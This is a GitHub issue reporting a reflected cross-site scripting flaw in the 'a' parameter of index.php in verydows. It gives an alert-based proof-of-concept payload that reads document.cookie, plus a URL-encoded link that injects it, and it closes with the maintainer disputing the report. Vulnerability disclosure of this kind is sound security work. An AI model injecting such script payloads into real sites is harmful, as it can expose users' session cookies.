Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Reflected Cross Site Scripting(XSS)-index.php #12

Closed
wwwwwwill opened this issue Feb 14, 2019 · 1 comment
Closed

Reflected Cross Site Scripting(XSS)-index.php #12

wwwwwwill opened this issue Feb 14, 2019 · 1 comment

Comments

@wwwwwwill
Copy link

wwwwwwill commented Feb 14, 2019

Environment installed from verydows-master

In page localhost/index.php?c=main&a=index, the Get function can change the function used in PHP, the user/attacker can modify the parament and add the script which will be shown without filtering. They can use the script to steal the cookie or some things worse

Payload used: <script>alert(document.cookie)</script>
Affected URL: http://localhost/index.php?c=main&a=index%3Cscript%3Ealert(document.cookie)%3C/script%3E

Navigate to the Affected URL, Payload would be triggered.

Payload used - <script>alert(document.cookie);</script>

  • Navigate to the Affected URL, Payload would be triggered.
    image
@cigery
Copy link
Contributor

cigery commented Mar 4, 2019

该问题不存在

@cigery cigery closed this as completed Mar 4, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants